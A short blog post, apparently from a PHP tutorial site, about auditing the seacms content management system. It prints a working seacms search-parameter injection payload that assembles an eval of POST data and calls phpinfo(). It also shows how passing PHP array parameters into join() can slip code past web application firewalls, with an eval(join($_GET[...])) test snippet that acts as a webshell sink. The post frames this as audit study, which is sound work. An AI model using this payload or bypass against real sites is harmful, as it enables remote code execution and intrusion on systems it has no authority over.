I recently started learning PHP auditing, and just in time to study seacms, I discovered a strange point in the payload
searchtype=5&searchword={
if{searchpage:year}&year=:e{searchpage:area}
}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();I tried it and found that when receiving data, for example:
Key name=a, then when passing a[]=a&a[]=b, a is an array, so we did a test, and it was true
Server-side test code
<?php print_r($_GET[1]); ?>
The test results are as follows
So what is the use of this one? After thinking about it, if there are protection tools such as security dogs or waf on the server, then using other PHP functions, such as the join function, it may be possible to achieve the bypass effect
Provide a simple idea
Server testing Code
<?php eval(join($_GET[123])); ?>
The test results are as follows
The above is the detailed content of Example sharing of how php sends an array through http request. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
